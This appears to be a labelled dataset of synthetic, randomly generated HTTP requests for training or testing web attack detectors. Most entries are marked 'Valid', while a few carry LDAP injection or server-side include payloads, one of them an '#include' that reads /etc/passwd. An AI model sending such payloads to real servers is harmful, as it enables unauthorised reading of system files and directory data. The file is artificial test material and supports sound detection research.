Accept-Charset: koi8, windows-1250;q=0.3, iso-8859-15;q=0.5, us-ascii
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 216.117.63.126
Cookie: weutsios8=594
Cookie2: $Version="425"
Date: Wed, 16 Feb 05 20:34:19 CET
ETag: "3ooz@O1DCCjzfQ_jl"
Expect: 100-continue
From: etr2@eeroi.de
If-Modified-Since: Tue, 24 May 05 17:07:08 GMT
If-Unmodified-Since: Sat, 20 Jun 09 05:06:44 CET
If-Match: "t79yLfeNm3Q7swGqIlP"
If-None-Match: "PqQuZiauDwmJ@b149CaT"
If-Range: "HUngjKF@-sPQCc5Q"
Max-Forwards: 517
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM dDY0bmphZVU5YzFzZWRuZWFNcmlydnBBaWg1ZXRhZm1uRXlr
Authorization: NTLM M2hoaXBRcjlkaVRvY2dlanR6cnduNGVudFBmYXlJYmxoaGRlNQ==
Range: 5279-
Referer: /3peRp/ibjx4Ej/ggcnan/bofcl/aptC.msf
TE: trailers,trailers,chunked;q=0.8
Trailer: Cache-Control
User-Agent: Mozilla/1.1 (X11; U; Unix 1.4; ea-wo; rv:4.2.5) Gecko/31013331
UA-CPU: MIPS
UA-Disp: 4083,795,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9698x542
Via: 5.5 146.231.130.130, 4.7 117.81.239.13, zih/5.5 165.191.80.201
Transfer-Encoding: compress
Upgrade: eeW/8.4, 80lvm/8.7, iuez/6.4
Warning: 877 60.179.127.50 "ccGMviphn5uaaes" "Sun, 24 Jun 07 15:48:47 UTC"
X-Forwarded-For: 93.54.79.26
X-Serial-Number: 7259766093580029
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27363
Start - Id: 22002
class: Valid
GET /beses/e5h-YbHiIZAFzSl/abCHTCML.SsrL8NxFh.htm?dadlteedumio=plb+cl0bNii+h&i54Oaccess_loghp=8687&bHZltmpOhtaccesA1--=72 HTTP/1.1
Host: www.ehaen.be
Connection: lotydjao
Accept: application/x-tar;q=0.1, video/quicktime;q=0.8
Accept-Charset: shift_jis;q=0.2, koi8-r
Accept-Encoding: 
Accept-Language: 5e3ionR-arnryEte;q=0.8, fl-xehqKrnH, onl-ow5nat;q=0.3, hzs-nsenpi
Cache-Control: only-if-cached
Client-ip: 52.182.196.27
Cookie: tv7Hocehi=rotmp2iezlicatd2E i[Hinull
Cookie2: $Version="91"
Date: Fri, 06 Feb 09 17:01:34 CET
ETag: W/"y@a9fTus_RQlTN96"
Expect: oeOybast=roeen;keie
From: egras@fbeiEuuht.cz
If-Modified-Since: Wed, 15 Jul 09 05:41:44 CET
If-Unmodified-Since: Wed, 18 Jul 07 17:03:20 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 23 Aug 04 18:46:38 UTC
Max-Forwards: 625
MIME-Version: 2.6
Pragma: ewzEn0gs='etHss'
Proxy-Authorization: acWit iAe1idba=buioi
Authorization: asEl rosue=nEoYmsee
Range: 048-5458,87200-
Referer: /yoU4ramh/ktlsTenb/g5oadu5/afusi.php3
TE: gzip;q=0.2,trailers,gzip;q=0.5
Trailer: Expect
User-Agent: Mozilla/9.4 (compatible; MSIE 3.1; Open BSD i386; ogayeio1; waQnglTrot)
UA-CPU: Sparc
UA-Disp: 514,290,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3071x562
Via: HTTP/9.7 92.252.123.133, HTTP/7.7 www.rtnp.jpg, 7.8 58.88.176.128
Transfer-Encoding: gzip
Upgrade: pufgp/8.1, Wcil/8.8
Warning: 370 48.243.99.195 "9ww8Tlbp3heasd9tLdl" 
X-Forwarded-For: 193.72.214.78
X-Serial-Number: 920022590702
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22002
Start - Id: 23379
class: Valid
GET /o3glTHUdVVV/tYJLJh9XpG/rhuhttheiykiea4.mspx?wRtacN=leS%40NQyg&nelpgeer=s-qpiXn&U6.E8TcNA=7i%40W4bh&wp-kWYIVC0wy=090&asctsegonloE=e4+&MRlRT6RFm95=c0-o&tnembj=tolyi2bin&ihwiSEtl=mA3-zdY&tm4G5L3tmpr=tn&vhtaccesnEBNyl3=756235853&s9@YstyleDMstJiF=+%5CA%27A&nns=w28&2mirhn=190325 HTTP/1.1
Host: 29.247.78.117:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 205.45.91.13
Cookie: N2hq9rYPgF-=pe8eoTEruhhorr;grsfa=owjI;rULVKia=e'nm;Preplace81NomZb=122792498
Cookie2: $Version="15"
Date: Fri, 27 Oct 06 09:38:44 GMT
ETag: "PVA.MqLFz4oha73"
Expect: idseOee
From: kisol@le4e.uk
If-Modified-Since: Fri, 23 Jan 04 21:48:46 UTC
If-Unmodified-Since: Wed, 10 Dec 08 17:21:19 UTC
If-Match: *
If-None-Match: "D77Q5YG0IKzqGH6nB"
If-Range: Mon, 14 Jan 08 09:28:46 UTC
Max-Forwards: 7
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Basic OW9lVHQ5OkNXOW9wcjZv
Authorization: NTLM aThhT2FIaGhybWlzbnNkdHNvbmNhbkVzaXMxenN4RHBvaXNaZm5z
Range: -31,662-
Referer: http://www.2ehn.it/uws5ci/aoxt/iyM2.txt
TE: gzip,chunked,trailers
Trailer: Date
User-Agent: t5tyr/8.7
UA-CPU: StrongARM
UA-Disp: 9336,5495,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 506x4645
Via: 2.1 www.snySdea1.htm
Transfer-Encoding: identity
Upgrade: meh/9.7, mssuJl/4.3, titl/9.9
Warning: 767 www.nutng.jpg "imrettlerf" "Thu, 18 Feb 10 04:49:03 GMT"
X-Forwarded-For: 95.103.231.158
X-Serial-Number: 996709990396001467
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23379
Start - Id: 13449
class: Valid
GET /g3NeemzPURU/FTNdUunionulbBCT1-B/eo0b6tye3sst/d@D8M-AqM-CKKmU/aotz/XxWimEHbAb_J/v-r_7M8V10..tiff?anLwns=790&-SzU@12T=5888&meoina9ToDg=0Nh2YlW&aieuzgosuh1i=ouio&pTl=%2F%24%25epsn%259&hnbnlenNo=08&unionpVl2_-Crol=47646248&4VIAZdmhYZ9=tRhitOl5eoirlts3nz&tI=tranporuiihEo2&76d=c7ImvKUl&fuole3Onrhgcmo=98232&IvarxUkX=tti HTTP/1.1
Host: 147.216.120.90:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Dcr7t-id, tsn6o5Do-gxwm
Cache-Control: max-stale
Client-ip: 61.236.0.64
Cookie: iaOcG=197661;sdkt=86;d8kh=90473;hdaz7tgLi=068348880
Cookie2: $Version="193"
Date: Mon, 18 Jan 10 02:38:10 UTC
ETag: W/"xnaDYbZ8R0GKRm.lcO2"
Expect: 100-continue
From: onWi@fbwst.st
If-Modified-Since: Sun, 30 Apr 06 03:00:07 GMT
If-Unmodified-Since: Tue, 04 May 04 19:41:40 UTC
If-Match: *
If-None-Match: "DjRGbv6EWuQj0cny"
If-Range: "2I-PXy_jdO@8OwMb"
Max-Forwards: 1
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: NTLM c29lb25mYXNyc25sc29uZUJkb2F4b2FlczBqRWxOck50cHJsaQ==
Authorization: dshsfr ockh=4too
Range: -20257
Referer: http://7tmq.it/imsla.tiff
TE: trailers,trailers
Trailer: Authorization
User-Agent: oteNvReatTceGtdo6ey
UA-CPU: PowerPC
UA-Disp: 710,2643,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 9732x9138
Via: 8.2 www.eptl.jpg, 9.7 www.dlOe.html, FTP/2.4 83.212.224.219:9
Transfer-Encoding: gzip
Upgrade: gau/6.0
Warning: 231 www.rsit.htm "dIbgtoshqoaaxhmt" "Sun, 20 Jun 04 15:44:58 CET"
X-Forwarded-For: 37.38.29.200
X-Serial-Number: 564796261351412431
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13449
Start - Id: 38262
class: LdapInjection
GET /nnunrlfxitpP/lwinntV1KYi@s/rilus2derlet/qqcqemAJTZIipxq_j.sh?n6ehieixe0cEao=k5xbesaeaaehs&ii9e=50901&UraGSQE=ncss8&6cdgfdl=hl2e%26i&fru=servicesIbo%3Elsom+&sfy6tuje=ateaatlzuiLe&0logThqP=emD&eeeeEo=yrttharphpoO+vartmpphpauhtolib&peti=7utcnlalhyi&tDhnodNi0=7d1907d&al9vOoenyr8=7469&tvolredg=%29%28+++%7C+%28displayName%3Dhad*%29++%28name+++%3D+++had*++%29%28++mail%3Dhad*+%29&SgacceptL=63&hrtast=3&nrgytras=0 HTTP/1.1
Host: www.NSyi.biz:80
Connection: duhhvee
Accept: image/*, image/*
Accept-Charset: iso-8859-7;q=0.2
Accept-Encoding: identity, gzip;q=0.7, compress, deflate;q=0.2, identity;q=0.3
Accept-Language: *
Cache-Control: min-fresh=2
Client-ip: 113.81.106.78
Cookie: Urq=9154;Ka=tenzihrrr82tVvu9;trfr6ny=spj5nviw;wglnL0acr=08879;hiav=htbpesei3iinssOrc
Cookie2: $Version="57"
Date: Tue, 22 Feb 05 06:57:02 GMT
ETag: W/"vtsbqI40-WbGIOGz"
Expect: ftes
From: Eorust@uthn0.it
If-Modified-Since: Thu, 22 Mar 07 03:57:39 UTC
If-Unmodified-Since: Thu, 11 Nov 04 11:58:07 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 24 Feb 06 04:20:33 UTC
Max-Forwards: 16
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM ZXJydTFhY2xuaHV5YTBsYWFlZHVlbmF3aXJkbnV0aW10YQ==
Authorization: Digest realm
Range: 395742-,-784490,-6493
Referer: /hignan.jpg
TE: gzip,deflate;q=0.7,chunked
Trailer: Proxy-Authorization
User-Agent: tletsa
UA-CPU: PowerPC
UA-Disp: 284,6564,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 4041x0261
Via: 5.6 www.hety.css, 0.4 97.201.217.41:83070, aad/6.8 www.vmaei.gif
Transfer-Encoding: tdia8
Upgrade: eddcT/3.3, roas/0.6
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 169.43.23.55
X-Serial-Number: 05796287611
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38262
Start - Id: 23336
class: Valid
GET /Nbaaxohd1ls3elg/xm4TRVi-HPUGfphp/-6rdelete9/tET8eVmnincnowHg/I7ij6@mayHY/no8attl0n/xpGGw/eHLw8HB1TjWnQvh/tY6iV6V/Roa/ja.js?iEryms8hecAmoqw=+&ioYywekde=3801&BaRnHOandlibZ=swnyg804ievRsh&6tnne5de2n5de=y%29dstEs&tETaDas=wp-Taprocessing-instruction&Sulace=+%2Bp&Uo1UlenNOti=s&nabehtiaci1=evb2bKSpm&36lh9c=6943&e2h2tjaysi=%3Beeo&hivoirunet=ts&RAlsetw9olo=f7stelnet+rj+cd%7El+&ntl=zs7snnetoasi HTTP/1.1
Host: 169.217.170.55:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 222.151.220.198
Cookie: eHyaoEa1hhtt=5980;eNsteW=988794;xb.Tl8nPwindow.opendp=@d;Braopby=6733642
Cookie2: $Version="80"
Date: Thu, 29 Dec 05 24:03:43 UTC
ETag: W/"ynrqS@txFebq1J5v8"
Expect: 100-continue
From: ngco@Ws8iiNi.be
If-Modified-Since: Tue, 06 Apr 10 06:50:06 CET
If-Unmodified-Since: Thu, 18 Sep 08 13:19:39 UTC
If-Match: "lVHAqC367z@@jQF3_s"
If-None-Match: *
If-Range: "i7TQvnTlR0q9BZ6pl"
Max-Forwards: 37
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic OW9lVHQ5OkNXOW9wcjZv
Authorization: Digest nonce
Range: 56641-,-4,2-
Referer: http://www.in9zw.cz/nrulu/teArtt.htm
TE: chunked
Trailer: Warning
User-Agent: iseyrRNde9/9.0
UA-CPU: Sparc
UA-Disp: 295,003,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 229x4077
Via: FTP/7.9 116.208.197.65
Transfer-Encoding: deflate
Upgrade: djbm1/8.1, yti/6.3, troL/1.6, aze4re/4.7
Warning: 614 www.eyqtEs.shtml "o4SsAiadTpu" "Mon, 26 Jul 04 10:18:10 GMT"
X-Forwarded-For: 143.52.19.171
X-Serial-Number: 22361064185048
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23336
Start - Id: 17839
class: Valid
GET /9iehatFenoesenaacags.jpeg?GOR@q=As7eo&dOuvMcha=4705656&JD8UechoOW=2ez25nsw3olbytwqn&EnvarelloMtrl=161321&iTMet8c=iB&iniigh=0pipwsw&access_log7Sflinsert7a=3981004&selectNs4RcF-61=s-xXii&tl@1htopen=fYYL&eiL2eeawdHtv=176216&Sdvhnn=oT.F&jieeDruti=tnnaifxmS8x9nip HTTP/1.1
Host: www.ttfoitev.be
Connection: hqpu
Accept: */*;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.5, deflate, gzip;q=0.8
Accept-Language: csFeapld-rElyddd;q=0.7, oulzAnft-tn5eu;q=0.1, s-meizwn, faoaei-mtbrhhh
Cache-Control: no-store
Client-ip: 114.91.73.48
Cookie: 8ngo6ssfyh=ajtBiMi.v2xk;rlpanEtnrpjwh=ael87amaeR;HikonU=364;imrhe=uf3Whr;ulpwh=07218;miu=tmscgE
Cookie2: $Version="8"
Date: Sat, 11 Sep 04 24:50:32 CET
ETag: "9pQKc3CITKwQn.pH7"
Expect: 100-continue
From: lrnihbje@e0fdWo.be
If-Modified-Since: Sat, 10 Apr 10 23:48:02 GMT
If-Unmodified-Since: Fri, 27 May 05 13:03:45 CET
If-Match: "Ucex-zDMkIcnD2s"
If-None-Match: "PLREwRp9XEtqipnVwFB"
If-Range: *
Max-Forwards: 9
MIME-Version: 0.5
Pragma: iap='Eapeh'
Proxy-Authorization: Digest nonce
Authorization: Basic NWljZWQ0OnRpdG1u
Range: 5-3
Referer: /ew7vnh/ooxn1z.cgi
TE: trailers
Trailer: Accept
User-Agent: xNKhFGHv http://www.ntadahwi.org
UA-CPU: StrongARM
UA-Disp: 8443,978,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3160x969
Via: FTP/0.3 www.amwoEnqh.jpeg
Transfer-Encoding: identity
Upgrade: nEs/1.9, s4wti/6.3, wEr/7.0, dbj8bm/0.2, eshoe/0.8
Warning: 772 19.4.250.196 "a2huUdChiyr6hamrt" 
X-Forwarded-For: 65.146.203.44
X-Serial-Number: 48264073243414
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17839
Start - Id: 39486
class: SSI
POST /D6htaccesBA7bp42Bz/eO8siAaiesmiqnrhnEyl/aoOMYZZO/gfTCiu_hhkthQ/1gPEe3B_KQU4.js? HTTP/1.0
Content-Length: 234
Content-Language: e6
Content-Encoding: gzip
Content-Location: http://www.brbhe8g.it/otdib/anoeaa/iata/ttsr.dll
Content-MD5: YWl0ZVJ0ZWFlcnkxaGhhZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 07 Jan 04 10:25:21 UTC
Last-Modified: Sat, 22 Sep 07 07:39:27 CET
Host: www.n8dwmcut.gov
Connection: close
Accept: application/rtf, audio/*;q=0.0
Accept-Charset: iso-8859-7, euc-jp, x-mac-arabic, x-mac-chinesesimp, iso-8859-4
Accept-Encoding: 
Accept-Language: oT-er;q=0.1, c9pe-SRsHetU;q=0.9, u-neaor, s0g-lzhyne;q=0.7
Cache-Control: only-if-cached
Client-ip: 229.81.195.128
Cookie: exz3xsvhsN=<!--#echo var="date_gmt"-->
Date: Wed, 12 Dec 07 09:39:40 GMT
ETag: "al@by7xP@iPI8Sbb2bU"
Expect: eee0pnR=7ytleLgA
If-Modified-Since: Sat, 24 Apr 04 10:30:28 CET
If-Unmodified-Since: Tue, 15 Aug 06 07:33:02 CET
If-Match: "6Tu14o0frw739r4JFN"
If-None-Match: *
If-Range: *
Max-Forwards: 674
Pragma: no-cache
Proxy-Authorization: Basic dGVpbW9oN2E6ZFBhbQ==
Authorization: NTLM cklrYWx0Mk53b2xudEhlQWZldW52dGNudHNpYWRhdHRpaG51
Range: -2,63669-
Referer: /ctir/atu9nur.php4
TE: deflate;q=0.5
Trailer: Range
User-Agent: 4mesav/5.1.8.9
UA-Color: color16
Via: jmo/0.7 241.152.37.237, 0.9 206.129.164.65
Transfer-Encoding: gzip
Upgrade: osned/0.8
----: ------------------------------------------------

eNnjnD=r2haphpeuaT70r e&ehut=9061&tokSsnrel=1rf&dxannh=aEmtAoy&h7nnryaf=ed&6tyJeydiDe=4E6igr&4dtsinhtmt=ve%<C&wgethavingRmA=lcho8rsebtettgsia&UgidAcYgroup by6=nfbZL5&oagedsx= szMrtaXh>&etc6tQEKu04PMU=6sA&5@rYjQmxfbodychild=rfisn

End - Id: 39486
Start - Id: 920
class: Valid
GET /bgsound0-qtexecvform/ZqpXqq@AaOxinsert/abeatESesaetp/XUgW/avrtRfmWIJ9q92q12SK_.aspx?lknSrrs=a5mG9&gbh=6c%26eg&eis9=oRXf47lof&et2btlIdogerNu=%24ne&ispebrhpsed4=6753256558&si3rc=ayhavingw&gOsk9dnl=6yqEgl&0eeoniritasLtt=l3a+t58&mlhEitplOnoe=ccTouP4aN&gl36euaou6=347&3enhe5M0eihpb=lnkcdes0tm&ten6woosisa=yf HTTP/1.0
Host: www.Eoy9s.uk
Connection: epei
Accept: image/*;q=0.1, image/gif, image/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=39337
Client-ip: 147.237.9.6
Cookie: ssEftoa1sf1ax=lochttpeJ7 9scripte0ycopyl>dmibody;Ieoxomoefne4hn=ie;eRnieemeygni1r=hhtanvhnir;gyShguTihae=o@f;mexjelehshdroe=7;4vl6es.51I=?iicle
Cookie2: $Version="9"
Date: Wed, 15 Sep 04 14:30:32 GMT
ETag: "N@esUxDZqG4wzHe"
Expect: etpt=Z3mqa;7euitmee=etfinn
From: 3sntq@jnenrb.uk
If-Modified-Since: Sat, 24 May 08 12:05:21 GMT
If-Unmodified-Since: Wed, 02 Sep 09 01:16:55 GMT
If-Match: *
If-None-Match: "mbzrXy7Ai3rk@wp7qvdL"
If-Range: *
Max-Forwards: 4456
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM b2FuczVhaHBsbno1RXJldWV0NXd0UnJzaWJ1cGtvZW5kb21TZWFFVHNzVA==
Authorization: NTLM c2JkdTVTbm9uYXRlbGhOUjhkaWZpc2NlaDdubmdyQzJ0R3lp
Range: 37-165,99813-448132
Referer: http://www.rtsmt1ee.de/trexgte0/ATes.tiff
TE: chunked;q=0.9,deflate;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/9.2 (Machintosh; U; PPC 4.7; iH-to; rv:2.7.0) Gecko/17121334
UA-CPU: StrongARM
UA-Disp: 626,1947,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 1573x8135
Via: HTTP/7.6 159.166.146.91:2
Transfer-Encoding: paaae
Upgrade: iehx1/0.3, ohanrn/8.7, 0ph/6.5, RaOe/2.8
Warning: 028 90.73.184.74:3067 "pe3oiolmIthbRveDesnt" 
X-Forwarded-For: 21.215.62.37
X-Serial-Number: 510626783025324042
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 920
Start - Id: 39809
class: SSI
GET /ZGgLStmp.php3?al=nu3Mh&SCNW-QstyleWkwheref_=sr9uelzo3e&pm9Cssp92t=3128&itpsmneetioi1=70502416&2huaacs=%3C%21--++++%23include+++++virtual%3D%22%2Fetc%2Fpasswd%22--%3E&3cnnnv4e2=cowhUoN&lmftT=vNeservicess&oioo=-Sei&w7yaene1h4mIe=Nsi0&VlogselectxzinsertDx6V=0jY7sAeoHHeeet7win HTTP/1.1
Host: 57.214.253.208
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: ors0i-s, uOtt-a;q=0.0
Cache-Control: no-cache
Client-ip: 43.200.222.134
Cookie: sgde=d2Lnas
Cookie2: $Version="9"
Date: Mon, 13 Oct 08 10:18:07 CET
ETag: W/"HB4MgAj2e0M.0QXb"
Expect: 100-continue
From: cbnnjsi@dofak2rw.org
If-Modified-Since: Sun, 19 Apr 09 11:59:37 GMT
If-Unmodified-Since: Thu, 05 Jan 06 10:41:42 UTC
If-Match: "5S2a5xeq29wu6Auy"
If-None-Match: "UcwULRMLtApxhRL-PO-"
If-Range: Sun, 15 Jun 08 07:53:42 CET
Max-Forwards: 79
MIME-Version: 1.9
Pragma: f5r=8li
Proxy-Authorization: Digest username="eege"
Authorization: Digest username="oeue"
Range: 9717-347450,4-
Referer: /anunbe7/anEelhr/nntst/oa2eg1/spsedWbi.swf
TE: deflate;q=0.4,gzip;q=0.6,trailers
Trailer: Connection
User-Agent: Mozilla/5.2 (compatible; MSIE 1.7; Mac OS X; eo57nEiere)
UA-CPU: Sparc
UA-Disp: 052,114,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 468x7869
Via: 3.0 223.213.41.58:544, HTTP/1.3 144.44.248.41, FTP/6.0 250.151.244.186
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
Warning: 410 230.107.4.184 "ldn6oohitmEt6c" 
X-Forwarded-For: 142.194.73.31
X-Serial-Number: 0280999804959
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39809
Start - Id: 12160
class: Valid
GET /S4b4MAwghL7sphpvarecho/lmesnvge/ip6MNPJIP/nhntK0tnTTa5niM49o/MphpgkPw_unionl/eg7xtq3@tpS276q/ivLXscript/nhrR5djTniaea2h/avIbY.exe? HTTP/1.0
Host: www.qixea.biz
Connection: close
Accept: audio/*, application/x-tar;q=0.0
Accept-Charset: gb2312;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: 8a='lsad'
Client-ip: 21.246.158.137
Cookie: paeelyt=eu$8c1ritmpo0dit;ntaiNlt=3242354
Cookie2: $Version="2"
Date: Sat, 24 Jan 09 12:03:38 CET
ETag: "F1UNx3ec86UdWlLx"
Expect: 100-continue
From: 3llueiuh@dwE6ieEe.uk
If-Modified-Since: Fri, 26 Feb 10 10:01:30 CET
If-Unmodified-Since: Thu, 27 Nov 08 06:46:02 CET
If-Match: "5jTdLCX.dDvTbIs.sp"
If-None-Match: "KR.sv-YpwRKlYacsEGNd"
If-Range: *
Max-Forwards: 0435
MIME-Version: 1.4
Pragma: hhniAti=qoseS
Proxy-Authorization: lert mmeei=fdhn
Authorization: Basic ZTJ0MG41ZDo2b3N1
Range: 807559-8320
Referer: http://hdnni1.uk/zedaiaB.php4
TE: gzip;q=0.5,trailers
Trailer: Host
User-Agent: fthrh (sY0eLm..qb)
UA-CPU: 68000
UA-Disp: 908,936,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 5894x857
Via: HTTP/6.1 205.116.19.63, iayno/5.1 201.108.142.32:238
Transfer-Encoding: identity
Upgrade: necoeD/4.9
Warning: 799 56.216.155.145 "xcmStingtiLaa" 
X-Forwarded-For: 215.199.241.153
X-Serial-Number: 99725023233624761
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 12160
Start - Id: 28492
class: Valid
GET /arasYDhZ90PUtZiF4/ghOSd1@WSyI/nus97/5trrrtpeah/aVd7r@EjW/tfgzmUBNGKKQdkaggYyS.jpg?tr=ncn%7Ergsnr2%25aaue&IC1=nR3&iTbOhgjw6n=8%7Ccnegroup+bymeagotes HTTP/1.0
Host: 4.168.190.147:80
Connection: fehl9Nhe
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.5, identity;q=0.6, deflate;q=0.2
Accept-Language: es-iaeae
Cache-Control: roho='oftao'
Client-ip: 229.55.227.78
Cookie: adrm6ets=lAAdoTDNukO;nrean=as3tnnjc;en2s=ban;FyxBcpasswdJstdinhavingA=rBCS-ZHnGlH
Cookie2: $Version="794"
Date: Thu, 27 Dec 07 21:14:40 GMT
ETag: "Wk4KQloP1FWKrsVUXgTm"
Expect: 100-continue
From: eSaii@Beribes6hy.fr
If-Modified-Since: Fri, 11 Jan 08 06:40:22 UTC
If-Unmodified-Since: Thu, 29 Apr 10 01:28:35 UTC
If-Match: "1@5fSMP-AwJXg6RLgYrY"
If-None-Match: "9aVQ.Q19klv1cnDX0qp"
If-Range: *
Max-Forwards: 277
MIME-Version: 1.7
Pragma: enahe='oricoe'
Proxy-Authorization: et2e taNgj=ss0tnse
Authorization: NTLM b3BtaGluc2ltYXM1ZXJlY3RoZ2lyZGhpb2llczlhcnBxb3JwZWxkZXVz
Range: -6,2-
Referer: /na5eoo/errcel/catltt.png
TE: gzip;q=0.5
Trailer: Connection
User-Agent: XsHlnoooiN (rsuzB3; eaOwOTv; ijyJ9Yx; tGqvjfEU; 48mABI)
UA-CPU: x86
UA-Disp: 2714,6071,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 116x668
Via: dhceHo/2.1 162.169.250.198, HTTP/8.8 www.ghoys.tiff, u7wR/7.9 www.6ksonnss.png
Transfer-Encoding: deflate
Upgrade: t5rg/1.6
Warning: 107 www.iwhhs.shtml "74siedtii" 
X-Forwarded-For: 36.15.26.228
X-Serial-Number: 5388761859689646
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 28492
Start - Id: 15699
class: Valid
GET /aahirS/uSEsuZKb4K/aSeFIjssFTdTCllX5/hswwurpyN_tECh@aY2G/wLXMzZ1UYoS/9vbscript3r.nsf? HTTP/1.0
Host: www.tndl1.net
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.0, x-mac-arabic, iso-8859-9, iso-2022-jp, isiri-3342;q=0.4
Accept-Encoding: deflate, gzip;q=0.6
Accept-Language: *;q=0.1
Cache-Control: min-fresh=248
Client-ip: 165.238.234.97
Cookie: 2g=i;p0itscr=breti;lta0io=uPlz95h;eet=natrckTLnemu0;tifanmfiuf=1839
Cookie2: $Version="81"
Date: Sun, 26 Apr 09 21:22:59 UTC
ETag: "4HKQSqX5rLHIfLrMjJ"
Expect: adapRas=stI4
From: aidedtls@ci4kCcst.biz
If-Modified-Since: Mon, 22 Mar 04 07:20:59 UTC
If-Unmodified-Since: Wed, 16 Apr 08 13:04:15 CET
If-Match: *
If-None-Match: "UfAdEtto31ayJUFG"
If-Range: Thu, 03 Nov 05 16:38:04 CET
Max-Forwards: 139
MIME-Version: 2.8
Pragma: emyaoo=faEt
Proxy-Authorization: NTLM TndhbXRyemVrdG91ZWxlczlhZUFjdGFucm5ldHRvZXpJc2Rob3ZjaDJsaWNzemk0
Authorization: wipuA a3Tgeon=6ntigsn
Range: -2
Referer: /ineml8c/tt74to/TidhgijT/roaiv.pl
TE: trailers,deflate,deflate;q=0.8
Trailer: Trailer
User-Agent: Mozilla/4.9 (Machintosh; U; PPC Mac OS X 1.5; ef-o8; rv:5.5.8) Gecko/76509974
UA-CPU: StrongARM
UA-Disp: 9331,266,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8122x873
Via: 5.4 220.197.90.59:47, 7.3 120.107.222.102, HTTP/5.8 132.180.227.128
Transfer-Encoding: identity
Upgrade: sli/9.1, Dh6/9.5, rWe/7.7, euhI/9.9
Warning: 451 194.177.41.7 "maNtqhbf" 
X-Forwarded-For: 23.70.171.229
X-Serial-Number: 9307845835407773
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15699
Start - Id: 24552
class: Valid
GET /3qm6WfP5pb/eOW2S/arDfbmtII/cesrjecpnh/.ftpS.Y_n/tb/vKZUVDFbf@/aIMLI5vQc3YDJKAC2Y-/9sgmNdtbhnr/nx10z9.js?St2ezAtblnwdL=691&EuWOkr7=5hansarimg%7Ckt3%7C7kot&iaeoaets=39&iee=6 HTTP/1.1
Host: 53.135.206.146:80
Connection: keep-alive
Accept: audio/basic;q=0.1, audio/*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 214.196.246.18
Cookie: hfnn=22;roi=265166
Cookie2: $Version="50"
Date: Thu, 17 Dec 09 21:15:47 GMT
ETag: "YB2LKGSxc6yUsvNNr-M"
Expect: 100-continue
From: 1ulNhsn@sSweeqd.gov
If-Modified-Since: Sun, 22 Jan 06 02:04:09 UTC
If-Unmodified-Since: Fri, 18 Nov 05 06:03:16 UTC
If-Match: "WlX7-dTry.2wCac-LDYe"
If-None-Match: *
If-Range: Thu, 02 Jul 09 18:07:01 GMT
Max-Forwards: 864
MIME-Version: 2.4
Pragma: pdsehr3=R
Proxy-Authorization: oyTb n3auus1d=esdje3nn
